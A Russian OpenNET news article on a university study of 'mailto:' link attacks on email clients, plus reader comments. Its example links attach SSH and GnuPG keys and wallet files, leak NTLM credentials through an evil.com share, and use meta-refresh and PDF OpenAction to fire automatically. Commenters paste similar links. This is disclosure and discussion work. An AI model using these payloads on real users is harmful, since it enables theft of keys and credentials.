The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Атака на пользователей почтовых клиентов при помощи ссылок "mailto:"

19.08.2020 13:59

Исследователи из Рурского университета в Бохуме (Германия) проанализировали (PDF) поведение почтовых клиентов при обработке ссылок "mailto:" с расширенными параметрами. Пять из двадцати рассмотренных почтовых клиентов оказались уязвимы для атаки, манипулирующей подстановкой ресурсов при помощи параметра "attach". Ещё шесть почтовых клиентов были подвержены атаке по замене ключей PGP и S/MIME, а три клиента оказались уязвимы для атаки по извлечению содержимого зашифрованных сообщений.

Ссылки "mailto:" применяются для автоматизации открытия почтового клиента с целью написания письма заданному в ссылке адресату. Кроме адреса в составе ссылки можно указать дополнительные параметры, такие как тема письма и шаблон типового содержимого. Предложенная атака манипулирует параметром "attach", позволяющем прикрепить к создаваемому письму вложение.

Почтовые клиенты Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) и Pegasus Mail оказались уязвимы тривиальной атаке, позволяющей автоматически прикрепить любой локальный файл, указанный через ссылку вида "mailto:?attach=путь_к_файлу". Файл прикрепляется без вывода предупреждения, поэтому без специального акцентирования внимания пользователь может не заметить, что письмо будет отправлено с прикреплением вложением.

Например, при помощи ссылки вида "mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" можно подставить в письмо закрытые ключи от GnuPG. Также можно отправить содержимое криптокошельков (~/.bitcoin/wallet.dat), SSH-ключи (~/.ssh/id_rsa) и любые доступные пользователю файлы. Более того, Thunderbird позволяет прикреплять группы файлов по маске при помощи конструкций вида "attach=/tmp/*.txt".

Кроме локальных файлов некоторые почтовые клиенты обрабатывают ссылки на сетевые хранилища и пути в IMAP-сервере. В частности, IBM Notes позволяет передать файл из сетевого каталога при обработке ссылок вида "attach=\\evil.com\dummyfile", а также перехватить параметры аутентификации NTLM направив ссылку на SMB-сервер, подконтрольный атакующему (запрос будет отправлен с текущими параметрами аутентификации пользователя).

Thunderbird успешно обрабатывает запросы вида "attach=imap:///fetch>UID>/INBOX>1/", позволяющие прикрепить содержимое из папок на IMAP-сервере. При этом извлекаемые из IMAP письма, зашифрованные через OpenPGP и S/MIME, автоматически расшифровываются почтовым клиентом перед отправкой. Разработчики Thunderbird были уведомлены о проблеме в феврале и в выпуске Thunderbird 78 проблема уже устранена (ветки Thunderbird 52, 60 и 68 остаются уязвимыми).

Старые версии Thunderbird оказались уязвимы и для двух других вариантов атаки на PGP и S/MIME, предложенных исследователями. В частности, к Thunderbird, а также к OutLook, PostBox, eM Client, MailMate и R2Mail2 оказалась применима атака по замене ключей, вызванная тем, что почтовый клиент автоматически импортирует и устанавливает новые сертификаты, передаваемые в сообщениях S/MIME, что позволяет атакующему организовать подмену уже сохранённых у пользователя открытых ключей.

Вторая атака, которой подвержены Thunderbird, PostBox и MailMate, манипулирует особенностями механизма автосохранения черновиков сообщений и позволяет при помощи параметров mailto инициировать расшифровку зашифрованных сообщений или добавление цифровой подписи для произвольных сообщений, с последующей передачей результата на IMAP-сервер атакующего. Шифротекст при данной атаке передаётся через парметр "body", а для инициирования обращения к IMAP-серверу атакующего применяется тег "meta refresh". Например: '<meta http-equiv="refresh" content="60; URL=mailto:?body=-----BEGIN PGP MESSAGE-----[...]-----END PGP MESSAGE-----">'

Для автоматической обработки ссылок "mailto:" без участия пользователя могут применяться специально оформленные документы PDF - действие OpenAction в PDF позволяет автоматически запустить обработчик mailto при открытии документа:


   %PDF-1.5
   1 0 obj
   << /Type /Catalog /OpenAction [2 0 R] >> 
   endobj
   
   2 0 obj
   << /Type /Action /S /URI/URI (mailto:?body=-----BEGIN PGP MESSAGE-----[...])>>
   endobj



  1. Главная ссылка к новости (https://news.ycombinator.com/i...)
  2. OpenNews: Подробности атаки на шифрование PGP и S/MIME в почтовых клиентах
  3. OpenNews: Предложен метод определения коллизий в SHA-1, пригодный для атаки на PGP
  4. OpenNews: Массовая атака на уязвимые почтовые серверы на основе Exim
  5. OpenNews: Удалённо эксплуатируемая уязвимость в почтовом сервере qmail
  6. OpenNews: Уязвимость в ImageMagick, позволившая получить доступ к чужим вложениям в почте Yahoo
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/53570-mailto
Ключевые слова: mailto, thunderbird, mail
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (108) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, jfdbngh (?), 14:41, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +14 +/
    Если каждый китаец наберет случайную строку на клавиатуре, то с 99% вероятностью получится эксплоит.
     
     
  • 2.2, DeerFriend (?), 14:45, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Господин Трамп может подтвердить, что у них уже получилось.
     

  • 1.3, Аноним (3), 14:46, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    >Пять из двадцати рассмотренных почтовых клиентов

    Сестра! Список! Хочу НОРМАЛЬНУЮ альтернативу Thunderbird/Evolution/Claws.

     
     
  • 2.15, Аноним (15), 15:10, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    mailx
     
  • 2.18, жека воробьев (?), 15:16, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –6 +/
    outlook
     
     
  • 3.21, Аноним84701 (ok), 15:25, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > outlook
    > R4: Certificates are automatically imported, thereby replacing old ones
    > что позволяет атакующему организовать подмену уже сохранённых у пользователя открытых ключей.

    Так себе "альтернатива".

     
  • 3.22, Перастерос (ok), 15:29, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    аутглюк, аут!
     
  • 3.107, rvs2016 (ok), 22:13, 23/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    pine! Alpine!
     
  • 2.20, Аноним84701 (ok), 15:23, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >>Пять из двадцати рассмотренных почтовых клиентов
    > Сестра! Список! Хочу НОРМАЛЬНУЮ альтернативу Thunderbird/Evolution/Claws.

    Claws-то чем провинился?
    > O2: Drafts are saved unencrypted even though encryption is enabled
    > E1: The attach parameter of mailto URIs is not supported.
    >

     
     
  • 3.59, Аноним (59), 20:35, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > The attach parameter of mailto URIs is not supported.

    Как это not supported? Только что проверил: приаттачивает, но выводит об этом сообщение, которое невозможно не заметить. Ключик ssh аттачить отказался, мол potential private data leak.

     
     
  • 4.89, Аноним84701 (ok), 12:03, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    >> The attach parameter of mailto URIs is not supported.
    > Как это not supported? Только что проверил: приаттачивает, но выводит об этом
    > сообщение, которое невозможно не заметить.

    У меня только сообщение "File doesn't exist or permission denied!". Даже если прописать в ссылке "/home/anon/существующий_файл".

     
  • 3.106, Убить_Криса (?), 09:13, 23/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Очень глючный
     
  • 2.23, Аноним (23), 15:42, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    aerc
     
     
  • 3.33, Siborgium (ok), 17:18, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Тормозное и глючное Goвно. Зря Drew DeVault изменил сишке, авось лучше бы получилось. Пользовался примерно неделю, вообще не понравилось. (neo)mutt, и тот лучше.
     
  • 2.26, ss (??), 16:07, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Пишите!
     
  • 2.28, Аноним (28), 16:16, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –8 +/
    Gmail
    /thread
     
  • 2.31, Алексей (??), 16:52, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    KMail.
     
     
  • 3.109, ___ (??), 07:55, 24/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Тащить себе половину KDE ради почтовика?
     
  • 2.68, Ilya Indigo (ok), 22:44, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Trojita к этому не уязвима, только что проверил!
    А как на меня тут https://www.opennet.ru/openforum/vsluhforumID3/121309.html#17 косо смотрели...
    Вход шли минусы и такие хипстерские выражения, как "минимальное чувство прекрасного" XD.
    А оказалось это самый дырявый почтовый клиент. причём многие пользователи используют именно старую, однопотчную менее прожорливую версию. Вот так вот!
     
     
  • 3.76, iPony129412 (?), 06:43, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ну так уязвимости в Thunderbird нет.
    Это в линуксах обделались
    https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
     
  • 3.79, Атон (?), 10:09, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Эк тебя задело..

    Один только _одинаковый_ интерфейс пользователя на линуксе и виндовсе, примиряет с "прожорливостью".

    Еще Thunderbird используют для совместимости.
    Один профиль, простой и понятный, легко переносимый на флешке для линукса и виндовса.

    В других почтовых клиентах дырявость еще не обнародовали а какая то там мнимая поточность вообще никого не волнует, кроме отмороженых хипстеров.

     

  • 1.4, Аноним (4), 14:51, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > путь_к_файлу

    И какой путь?

     
     
  • 2.5, Аноним (5), 14:53, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    ~/.bitcoin/wallet.dat
     
     
  • 3.6, Аноним (4), 14:54, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –3 +/
    А если нет такого?
     
     
  • 4.7, Ag (ok), 14:56, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +13 +/
    На значит на этой машине не повезло, ждем-с другую. Интернет-с - он большой.
     
     
  • 5.9, Аноним (4), 14:59, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –4 +/
    Так это глупо - отвечать на письма от незнакомых адресатов. Их в спам помещают или игнорируют.
     
     
  • 6.19, жека воробьев (?), 15:17, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +4 +/
    тут не про отвечать, а про ссылки mailto
     
  • 6.53, Аноним (53), 20:07, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Почему сразу "не знакомых"? А может знакомых. Может это какой-то магазин офигительных товаров и скидок куда пользователь пишет письмо т.к. на сайте написано "напишите нам и мы отправим вам товар". Пользователь пишет, ему в ответ приходит "ваш товар готов к отправке, вам удобно получить товар на этой или на следующей неделе" и вот в этом письме mailto.
    Почему все думают что самые умные?
     
  • 5.12, Аноним (4), 15:01, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Thunderbird позволяет прикреплять группы файлов

    И глупо отправлять послание, не взглянув на окошко со списком вложений.

    Так что проблема скорее не реализации и не протокола даже, а опять социальная.

     
     
  • 6.78, Атон (?), 09:59, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Люди в это окошко не заглядывают даже когда сами добавили или должны были добавить аттач.

    Конечно социальная инженерия. Бьет в цель наверняка.

     
  • 3.8, Аноним (4), 14:57, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –3 +/
    И такого нет

    ~/.ssh/id_rsa

     
     
  • 4.11, Иваня (?), 15:01, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    ~$ cat ~/.ssh/id_rsa
    cat: /home/Иваня/.ssh/id_rsa: No such file or directory

    ~$ cd ~/.ssh/id_rsa
    bash: cd: /home/Иваня/.ssh/id_rsa: No such file or directory

     
     
  • 5.27, ss (??), 16:11, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Вы просто не участвуете соревновании. Спокойно игнорируйте :)
     
  • 4.66, Ilya Indigo (ok), 22:26, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    У нормальных пользоватедей давно уже
    ~/.ssh/id_ed25519_key
     
     
  • 5.80, Атон (?), 10:14, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Поподробнее пожалуйста расскажите [a href=mailto:?to=fsb@nsa.gov&subject="Докладываю про нормальных пользователей подробнее"&body="Позвольте приложить список нормальных пользователей "&attach=~/.ssh/*]про нормальных пользователей[/a].  Очень интересно
     
  • 2.16, Аноним (15), 15:13, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Страдание путь твой, человек.
     

  • 1.10, yet another anonymous (?), 15:01, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    html в почте --- плохо. Нелокальное действие при обработке содержимого --- не плохо, а альтернативноодарённо.
     
     
  • 2.13, Аноним (4), 15:02, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +2 +/
    По умолчанию отключено.
     

  • 1.14, Аноним (14), 15:10, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Вывод, как минимум, не хранить важных данных в стандартных каталогах
     
     
  • 2.34, Siborgium (ok), 17:29, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    OpenSSH принципиально отказывается менять каталог. Что теперь делать, об стенку разбиться?
     
     
  • 3.38, Michael Shigorin (ok), 18:31, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Вас никто не заставляет ключи openssh держать в файлах с предсказуемыми именами (да и путями тоже).  Это превратит почти неинтерактивную атаку с одним-единственным элементом социнжиниринга ("лишь бы не заметил список приложений") в как минимум двухстадийную целенаправленную при необходимости её успеха -- сперва надо выкрасть ~/.ssh/config и посмотреть IdentityFile.
     
     
  • 4.90, ALex_hha (ok), 13:00, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    а шифрование приватого ключа - вообще делает такие атаки бессмысленными, от слова совсем
     
  • 3.40, Аноним84701 (ok), 18:49, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > OpenSSH принципиально отказывается менять каталог. Что теперь делать, об стенку разбиться?

    Классическое решение:
    запускать браузер от другого пользователя (например, <name>surfer), у которого доступ в "основной" ~ есть только в ~/downloads

     
     
  • 4.96, Аноним (96), 22:32, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    ага. типичный линуксокостыль - на каждый пук заводить по пользователю. зачёт. ещё и группу можно.
     
     
  • 5.97, Michael Shigorin (ok), 22:39, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > ага. типичный линуксокостыль

    Нет, типичный ламер, не слышавший про privsep.

    http://altlinux.org/hasher для запуска всякой недоверенной жути тоже некоторые коллеги применяют.

     
  • 2.35, Siborgium (ok), 17:29, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Да и само ваше "решение" лечит в лучшем случае симптомы, а не проблему.
     

  • 1.17, тоже Аноним (ok), 15:14, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    Создал файл со ссылкой
    mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.ssh/id_rsa
    Щелкнул. Открылся Thunderbird, подставил Title и Text... и не прикрепил никаких вложений, хотя такой файл есть.
    Версия 68.10 - по информации в статье, "уязвимая".
     
     
  • 2.25, ss (??), 15:54, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Может чтобы оно сработало надо плагин поставить?
     
     
  • 3.29, тоже Аноним (ok), 16:21, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Может чтобы оно сработало надо плагин поставить?

    Ага, предварительно скомпилировав.

     
     
  • 4.30, ss (??), 16:22, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Предварительно пропатчив авторскими фиксами после посылки багрепорта...
     
     
  • 5.36, Аноним (36), 17:52, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +7 +/
    Да ну нфиг слишком сложно пишите просто сразу куда слать этот ~/.ssh/id_rsa файл?
     
     
  • 6.108, rvs2016 (ok), 22:17, 23/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Да ну нфиг слишком сложно пишите просто сразу
    > куда слать этот ~/.ssh/id_rsa файл?

    Это всё-равно сложно.
    Пишите лусша сразу куда слать ДЕНЬГИ :-)))

     
  • 2.32, Аноним (32), 16:52, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Мои эксперименты с kmail дали такой результат: оно действительно пытается приложить файл, но это всегда заканчивается ошибкой "файл не существует". Хотя я проверял на тех файлах, что 100% существуют и доступны.
    При этом, в окне редактирования письма горит огромная красная надпись, что вложения были добавлены внешней программой, и нужно их проверить.
     
     
  • 3.37, sergey (??), 18:03, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Нужно путь к файлу без тильды писать, тогда существует. Но большая красная надпись всё равно горит.
     
     
  • 4.41, тоже Аноним (ok), 19:25, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Нужно путь к файлу без тильды писать, тогда существует. Но большая красная надпись всё равно горит.

    Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.

     
     
  • 5.43, Аноним (43), 19:37, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +3 +/
    /root/.ssh/id_rsa
     
     
  • 6.49, тоже Аноним (ok), 19:53, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > /root/.ssh/id_rsa

    Во-первых, это не мой. Во-вторых,
    $ cat /root/.ssh/id_rsa
    cat: /root/.ssh/id_rsa: Permission denied

     
  • 5.52, Аноним (52), 20:06, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    >Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.

    Да, легко: .ssh/id_rsa будет обработано как ~/.ssh/id_rsa. Хотя возможно если для программы установлена какая-то другая рабочая директория, то тогда путь развернется в другой файл. Проверять это я, конечно же, не буду.

     
     
  • 6.57, тоже Аноним (ok), 20:18, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Да, легко: .ssh/id_rsa будет обработано как ~/.ssh/id_rsa. Хотя возможно если для программы установлена какая-то другая рабочая директория, то тогда путь развернется в другой файл. Проверять это я, конечно же, не буду.

    Ну, это же так несложно. Достаточно поправить данную мной выше ссылку прямо в браузере, щелкнуть... и убедиться, что оно таки по-прежнему не работает.
    Хотя pwdx 'pgrep thunderbird' таки показывает домашнюю папку текущего пользователя.

     
  • 5.99, OpenEcho (?), 02:07, 21/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.

    $HOME/.ssh/id_rsa

     
     
  • 6.100, тоже Аноним (ok), 13:32, 21/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > $HOME/.ssh/id_rsa

    Это с какого бы перепугу функции файловой системы стали раскрывать переменные окружения?

     
     
  • 7.101, OpenEcho (?), 16:37, 21/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    >> $HOME/.ssh/id_rsa
    > Это с какого бы перепугу функции файловой системы стали раскрывать переменные окружения?

    Приехали...

    Тильда ~ это не есть функция файловой системы. Это алиас шела, который банально прется в среду и извлекает содержимое НОМЕ, которое в свое время заполняется функцией getpwent() вытаскивя из /etc/passwd домашнюю директорию.

    Зайдите в шел, сделайте следующее: export HOME=/etc; cd ~; pwd
    и пугайтесь сами :)

    Know your tool: http://www.gnu.org/software/bash/manual/html_node/Tilde-Expansion.html

     
     
  • 8.102, тоже Аноним (ok), 17:33, 21/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Который раскрывает, например, glob А если внимательно прочитать новость, ... текст свёрнут, показать
     
     
  • 9.103, OpenEcho (?), 22:41, 21/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Причем здесь новость я отвечал на вопрос ... текст свёрнут, показать
     
     
  • 10.104, тоже Аноним (ok), 23:17, 21/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Это другое дело Поздравляю, на этот вопрос вы ответили правильно Вы молодец ... текст свёрнут, показать
     
  • 3.42, Bdfybec (?), 19:32, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > вложения были добавлены внешней программой

    Что за внешняя программа?

     
     
  • 4.54, Sluggard (ok), 20:08, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Видимо, подразумевается программа, в которой открывалась ссылка «mailto:»  — она ведь передала параметр «attach».
     
  • 2.63, Аноним (63), 21:24, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Mailspring (snap):
    ?to=user@example.com&subject=Title&body=Text&attach=~/.ssh/id_rsa could not be found, or has invalid file permissions.

    Файл есть, а доступа нет. Я ничего не менял специально. К любым другим тоже не доступа у него.

     
     
  • 3.65, анончик (?), 21:55, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    ну так оно ж в песочнице, это ж snap
     
     
  • 4.75, iPony129412 (?), 06:12, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    SNAP не обязует песочницу.

    Да и у этого приложения есть вполне доступ ко всему хомяку пользователя
    https://github.com/Foundry376/Mailspring/blob/master/snap/snapcraft.template.y

    Просто пути поехавшие.

     
  • 3.74, iPony129412 (?), 06:04, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    https://snapcraft.io/docs/environment-variables

    HOME
    This environment variable is re-written by snapd so that each snap appears to have a dedicated home directory that is a subdirectory of the real home directory.

    Typical value: /home/_user_name_/snap/_snap_name_/_snap_revision_

     

  • 1.24, Аноним (23), 15:44, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Больше похоже на "браузеры не фильтруют параметры для почтовиков".
     
     
  • 2.58, Аноним (59), 20:31, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +2 +/
    С какой стати они должны что-то фильтровать в URL?
     
     
  • 3.61, Аноним (23), 20:45, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Чтобы их пользователю не насовали интересного?
     
     
  • 4.67, Аноним (59), 22:38, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    И что, им теперь надо научиться разбирать URL для всех схем со всеми возможными параметрами и начать подменять их?
     
     
  • 5.105, Аноним (105), 10:56, 22/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Зачем для всех, дорогой, речь про вполне определённый mailto.
     

  • 1.39, Michael Shigorin (ok), 18:32, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Ну вот, опять не вижу в списке mutt...
     
     
  • 2.48, kusb (?), 19:51, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Консольные программы самые надёжные?
     
  • 2.95, PnD (??), 22:30, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    А он есть©
    Но лучше посмотреть на стр.5 PDF т.к. в новости легенду забыли.
    "Нет, не был, не состоял".
     

  • 1.44, user (??), 19:39, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Это дыра в стандарте mailto.
     
     
  • 2.47, kusb (?), 19:50, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Почему дыра? Это часть стандарта?
    Получается, что это заявленная возможность, так?
     

  • 1.45, Аноним (45), 19:39, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    >специально оформленные документы PDF - действие OpenAction в PDF позволяет автоматически запустить обработчик mailto при открытии документа:<

    вот это неприятно

     
  • 1.46, kusb (?), 19:47, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    Для того, чтобы отправить файл на наш сервис переименуйте его в send txt и распо... большой текст свёрнут, показать
     
  • 1.50, Аноним (50), 19:55, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Ыыыы... Какая прелесть!
     
  • 1.51, Аноним (51), 19:59, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    как неожиданно!
     
  • 1.55, timur.davletshin (ok), 20:08, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Стандартный Evolution из Debian stable прикрепляет и выводит в шапке письма предупреждение о том, что файл из скрытого каталога и может содержать приватную информацию. Т.е. сказать, что совсем об этом никто никогда не думал, нельзя.
     
     
  • 2.56, Аноним (45), 20:13, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    а не из скрытого что?
     
     
  • 3.64, timur.davletshin (ok), 21:30, 19/08/2020 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А так и было задумано... Вообще, я не вижу ничего критичного в таком поведении. Кнопку "Send" за меня оно не нажимает и ладно. Если пользователь настолько олень, что не смотрит, что отправляет, то это его личные проблемы.
     
     
  • 4.81, kusb (?), 10:41, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Вот я не согласен, дело в том, что я не слишком ожидаю отправки файла почтовиком из моей файловой системы. Я скорее не хочу быть постоянно напряжённым работая с компьютером проверяя то, что предлагаемые функции не делают плохие вещи.
    Так можно и в диалоге удаления файлов регулярку "*" по умолчанию подставлять, и запуск произвольной команды в стандарт mailto засунуть вместе с получением в аттаче файлов, которые вернёт эта команда и в веб-формы аналогичное поведение включить.
    Это просто не слишком ожидается, как по мне. Я вероятно не слишком ожидаю, что плеер не будет трактовать открытие исполняемого файла как его запуск и не проверяю перед открытием видео или что программа выставит уже существующее имя файла в диалоге сохранения и молча перезапишет его, или при установке перезапишет биос на кривую версию, или Синаптик в диалоге установки программы реализует действие по умолчанию "установить Яндекс Бар".

    Есть программа и то, что она делает. И есть то, над чем ты можешь не думать, потому что это не кажется её функциональностью. Если это почтовый клиент, то кому-то лучше думать о почте, или нет... а не о том, что она может отправить файл из файловой системы. Пусть даже она может, но ожидаемо ли это или нет?

     
     
  • 5.83, kusb (?), 10:48, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Ну ладно, может иногда и проверяю и в этом есть часть вранья. Про имя файла по умолчанию так вообще не уверен даже.
     
     
  • 6.84, kusb (?), 10:50, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Ну ладно, Синаптиком я не пользуюсь.
     
  • 5.87, timur.davletshin (ok), 11:20, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Берёшь apparmor профиль private-files-strict и запиливаешь его в качестве основы для своего любимого почтовика. Например, именно на его основе стоковый модуль для Evince режет доступ к каталогам gnupg, ssh, почты и чего-то, что я уже не помню.
     

  • 1.60, Анонннннннннн (?), 20:39, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Почтовик в контейнер, виртуалку, или пароль за запуск.
     
  • 1.62, Аноним (62), 21:03, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Спалил контору =(((( ну по крайне мере последние лет 5 это стабильно работало. и да Хелло html2pdf, dompdf и рукожопы 97% ;)
     
     
  • 2.85, Нечего (?), 11:11, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Что если эволютион отправить в дев нуль что бы он не смог работать на мне , давно замечаю эту блоатварь которую не вызывал гуляющей по диспетчеру задач , ну ладно крон итд , а эта то гуляет зачем ? Я уж думаю линукс особенно убунточка исправится хотя бы на нашей территории если директором этого филиала буду я , а не яндекс который прибежал уже после.
     

  • 1.69, Kuromi (ok), 23:25, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    *Facepalm*

    А мне всегда казалочь что ну такие тривиальные дыры давно прикрыты. Наверное всем так казалось, поэтому никто их и не озаботился прикрыть.

    С другой стороны, ссылок mailto вживую я лично не видел уже давно. Сейчас уже и почта-то - просто старомодной как-то.

     
     
  • 2.70, Аноним (70), 00:44, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Старомодно? А какие инструменты, на ваш взгляд актуальны, чем можно заменить почтовые ящики? Просто интересно
     
     
  • 3.94, Kuromi (ok), 21:41, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Старомодно? А какие инструменты, на ваш взгляд актуальны, чем можно заменить почтовые
    > ящики? Просто интересно

    Смотря для чего - личное общение - разные IM, рабочее - Слаки и тому подобное. Пресловутые списки рассылки были вытеснены багзилламии гитхабами.

    Впрочем, я не считаю что от емейла надо отказываться, но то что мир не стоит на месте - это точно.

     
  • 2.82, iPony129412 (?), 10:44, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > уже и почта-то - просто старомодной как-то

    Нет.
    Другое дело, что есть куча почтовых технологий устаревших, которые надо выкидывать

     

  • 1.72, Аноним (72), 03:33, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А поясните, пользователь сам потом отсылает письмо? Не автоматически же отсылается через mailto.
     
     
  • 2.73, Аноним (73), 05:44, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Да, поэтому там указано, что "пользователь может не заметить". То есть, может и заметить, а если бы уходило автоматически, то замечание не имело бы смысла.
     

  • 1.77, iPony129412 (?), 07:13, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    https://twitter.com/tsdgeos/status/1295493399638941696

    Бомбануло у КДЕшника

     
  • 1.86, Аноним (86), 11:17, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    firejail "Ваш любимый почтовый клиент"
    Со списком для firejail куда клиенту можно ходить.
     
  • 1.88, ИмяХ (?), 11:57, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
